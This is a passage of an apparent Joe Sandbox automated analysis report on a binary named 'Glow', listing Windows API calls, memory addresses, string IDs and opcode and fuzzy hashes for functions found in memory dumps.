                                                                                                                                                                          • Instruction ID: c2b7461bf09176f050887bd191720abac4f389718842531f99e4740027afab04
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d64c2b97732c73b64032ca8aa33cd82941628aa05dc4aa95c492b98224ddaa0
                                                                                                                                                                          • Instruction Fuzzy Hash: BE018071600218EFDB119F11DC84BEE7BB5FF45351F10C09AE84ADA250DB348A85EF25
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32(?,004528E0,0041AD55,000000FC,?,00000000,00000000,?), ref: 0041823F
                                                                                                                                                                          • GetFocus.USER32 ref: 00418247
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                            • Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 004182B4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 3601265619-3218771753
                                                                                                                                                                          • Opcode ID: 220b034afc7f5cbaf208c17765c00547c573d14aee17fe5689af01078fe77b37
                                                                                                                                                                          • Instruction ID: 3f2dce8d71998f58e5216b93b58873f7114bc1d18bf2a65d689df57fc5140432
                                                                                                                                                                          • Opcode Fuzzy Hash: 220b034afc7f5cbaf208c17765c00547c573d14aee17fe5689af01078fe77b37
                                                                                                                                                                          • Instruction Fuzzy Hash: F9017575602A00CFC316DF68D854AA637E6EFCA321F1442AEE416873B1CB35AC47CB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyAcceleratorTable.USER32(?), ref: 00418576
                                                                                                                                                                          • CreateAcceleratorTableW.USER32(00000000,?,?,?,003FBE96,00000000,00000000,?,00000001,00000002), ref: 0041858C
                                                                                                                                                                          • GetForegroundWindow.USER32(?,003FBE96,00000000,00000000,?,00000001,00000002), ref: 00418595
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 986409557-3218771753
                                                                                                                                                                          • Opcode ID: 719731c95a6b70c7df8bd36e25289f9d4a729f5d3712ec9764d7b8e88a920d7c
                                                                                                                                                                          • Instruction ID: edfbd86f3b845d51539e4e50f2c0a2257b5517ab002a60abad047bfefa503bad
                                                                                                                                                                          • Opcode Fuzzy Hash: 719731c95a6b70c7df8bd36e25289f9d4a729f5d3712ec9764d7b8e88a920d7c
                                                                                                                                                                          • Instruction Fuzzy Hash: D0015B71601704EFCB249F69D984AA637B2FB05322F10852FE515863B1DB74E890CB88
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00454038,0045407C), ref: 00418C1A
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00418C2C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                          • String ID: 8@E$|@E
                                                                                                                                                                          • API String ID: 3712363035-501201497
                                                                                                                                                                          • Opcode ID: 0ac6d4b37962fcd0a476dbab27c244d56bf097d520beaaf46ddc31d53d04b85f
                                                                                                                                                                          • Instruction ID: be7425853d813a0b969f72326998c4ca7272f93f96fd388e718511bf352b75f1
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ac6d4b37962fcd0a476dbab27c244d56bf097d520beaaf46ddc31d53d04b85f
                                                                                                                                                                          • Instruction Fuzzy Hash: 82F030B2541314BAE3106B646C45FB73A6CEB45B56F104031BF09D91E2D6658844C2AD
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 003DE797
                                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 003DE7BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                          • API String ID: 3013587201-2590602151
                                                                                                                                                                          • Opcode ID: 13bed45638b7d21f0193cc8c472bce6cc85c4ba1283ed0888732f7ca5373ffec
                                                                                                                                                                          • Instruction ID: f73329cc38ec8e9954295a58be74fd7b3c7c229c59e3aa70ccd2bfc2a1ad5eaf
                                                                                                                                                                          • Opcode Fuzzy Hash: 13bed45638b7d21f0193cc8c472bce6cc85c4ba1283ed0888732f7ca5373ffec
                                                                                                                                                                          • Instruction Fuzzy Hash: 14E02BB3C02521AFE77766205C84FE936187F10701B2645AFFC06FA244DB28CC84865C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 35872d1266c093123e76e83f16175967d8b6476de8d160a3468cbeba6a67fb91
                                                                                                                                                                          • Instruction ID: 8b5c5f1c46aeac4ea32cd41d80c8dd9f6bf7a8c5671971484292925e2d33ac77
                                                                                                                                                                          • Opcode Fuzzy Hash: 35872d1266c093123e76e83f16175967d8b6476de8d160a3468cbeba6a67fb91
                                                                                                                                                                          • Instruction Fuzzy Hash: A8C15D75A0026AEFCB09CF95C884AAEB7B5FF48704F218698E405DF291D771ED81CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                          • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                          • Instruction ID: f6c64dd636048223c067740540d5ea5b27d72b574d1c1632db71077bb4b17c15
                                                                                                                                                                          • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                          • Instruction Fuzzy Hash: C6A166359003869FDB13CF19C891BEEBBE4EF11318F1941ADE6998BA43C6348C51C758
                                                                                                                                                                          APIs
                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00420BD4,?), ref: 003E0EE0
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00420BD4,?), ref: 003E0EF8
                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,0041DCE0,000000FF,?,00000000,00000800,00000000,?,00420BD4,?), ref: 003E0F1D
                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 003E0F3E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 314563124-0
                                                                                                                                                                          • Opcode ID: f8c5ef9c7650b60ffd1ff874feb27094e7b38c5f89d4fe852b0fa1d3c8385943
                                                                                                                                                                          • Instruction ID: f433af267d8029ba9b7b18b211a4199b6c0057e95cb420b04ff5389077e9ae11
                                                                                                                                                                          • Opcode Fuzzy Hash: f8c5ef9c7650b60ffd1ff874feb27094e7b38c5f89d4fe852b0fa1d3c8385943
                                                                                                                                                                          • Instruction Fuzzy Hash: A6813971A00119EFCB05DF94C884EEEB7B9FF89315F204598E506AB250DB71AE46CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0040B10C
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040B11A
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0040B1FC
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040B20B
                                                                                                                                                                            • Part of subcall function 0039E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,003C4D73,?), ref: 0039E395
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1991900642-0
                                                                                                                                                                          • Opcode ID: b8030563ba1759d631aca8efec339adc378ed9398f81c9a1fbe2f0547503272d
                                                                                                                                                                          • Instruction ID: 08de07a5994e698833ac710e84479f7d70e04322589ac96aca902c332724b8d1
                                                                                                                                                                          • Opcode Fuzzy Hash: b8030563ba1759d631aca8efec339adc378ed9398f81c9a1fbe2f0547503272d
                                                                                                                                                                          • Instruction Fuzzy Hash: 42517EB1908301AFD311EF24C886A5BBBE8FF89754F40896DF5859B291EB34D904CB96
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: d35af86dd6ad98a74fcfaf5ed503bc4da4679f9c76128d1c6f992400b654b59c
                                                                                                                                                                          • Instruction ID: d14915a807626d92069ce58a377938ba7502c2bbdf3987f0f527031fcf75570d
                                                                                                                                                                          • Opcode Fuzzy Hash: d35af86dd6ad98a74fcfaf5ed503bc4da4679f9c76128d1c6f992400b654b59c
                                                                                                                                                                          • Instruction Fuzzy Hash: 26412D316046006EDB237BF98C46FBE36A4EF47730F25462DF514DA1A3DA354C016761
                                                                                                                                                                          APIs
                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 0040255A
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00402568
                                                                                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004025E7
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 004025F1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$socket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1881357543-0
                                                                                                                                                                          • Opcode ID: 07408d99d18c71b48649c89f11e16c2085140f417714e773d7c9a7c28c37070a
                                                                                                                                                                          • Instruction ID: 1d6127fbf43e4bff1d25427c09fd2c0068792676c9b926ee6f153d2b25767115
                                                                                                                                                                          • Opcode Fuzzy Hash: 07408d99d18c71b48649c89f11e16c2085140f417714e773d7c9a7c28c37070a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6641C674A00300AFE721AF24C88AF2677E5AB44714F54C498F91A9F3D2D7B6ED42CB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00416D1A
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00416D4D
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00416DBA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                                          • Opcode ID: 32120ed0bfc512a1c9610ab3a522cc62f82fa607e45ca7dad81eb50275103986
                                                                                                                                                                          • Instruction ID: c7c0fd26a766278ce81f57f254aedfbe5d77182032def60f91db7a824fb523b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 32120ed0bfc512a1c9610ab3a522cc62f82fa607e45ca7dad81eb50275103986
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E511B74A00209AFCF24DF68D9809EE7BB6EB45360F11816AF9159B390D774ED81CB54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 25f886bdecfb87c0e38403978de422c0206269db93cc1ac4bda7ce94e66d5dfa
                                                                                                                                                                          • Instruction ID: f2fe73a4230331ae458e2744d9f6d53561c576f1f3366945e5c19c5fb85ea6b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 25f886bdecfb87c0e38403978de422c0206269db93cc1ac4bda7ce94e66d5dfa
                                                                                                                                                                          • Instruction Fuzzy Hash: 0741DC71A00744AFD726AF78CC41BAAF7ADEB48714F10852EF251DF691DBB199418780
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003F61C8
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 003F61EE
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003F6213
                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003F623F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3321077145-0
                                                                                                                                                                          • Opcode ID: 385a5c9674f0fdd37d65f4142c101c2b9b40e3e93387f10622697a0b38b682c2
                                                                                                                                                                          • Instruction ID: 383ebec11a5aad92502d48ffa6c3ddd85f7e117f8571502134e0a21c9b2d553c
                                                                                                                                                                          • Opcode Fuzzy Hash: 385a5c9674f0fdd37d65f4142c101c2b9b40e3e93387f10622697a0b38b682c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 83411B39600614DFCB12EF15C545A5EBBE2EF89710B1984D8E95A9F362CB34FD01CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 003EB473
                                                                                                                                                                          • SetKeyboardState.USER32(00000080), ref: 003EB48F
                                                                                                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 003EB4FD
                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 003EB54F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                          • Opcode ID: 597d87ad2fd4fddd4cb8f9113e5f9a1d273d6d6f7661a16bb90ab26ecaea2666
                                                                                                                                                                          • Instruction ID: 7b665dbc214b3c5ebbaa48467d38bbe0ecf91ec10938db61259550dfdb8fb0c1
                                                                                                                                                                          • Opcode Fuzzy Hash: 597d87ad2fd4fddd4cb8f9113e5f9a1d273d6d6f7661a16bb90ab26ecaea2666
                                                                                                                                                                          • Instruction Fuzzy Hash: A0314B70A406B86EFF33CB6788057FBFBB9AB45310F04831AE495561D2C37489458B95
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 003EB5B8
                                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 003EB5D4
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 003EB63B
                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 003EB68D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                          • Opcode ID: b328ff7a0de1568bcfe9f720117d1cad5f30033a5137195e28368829c789f154
                                                                                                                                                                          • Instruction ID: 93c1f80f07f715869fb4c474e996c1a5a1157a2cc037142bef8bc25924b4bb5f
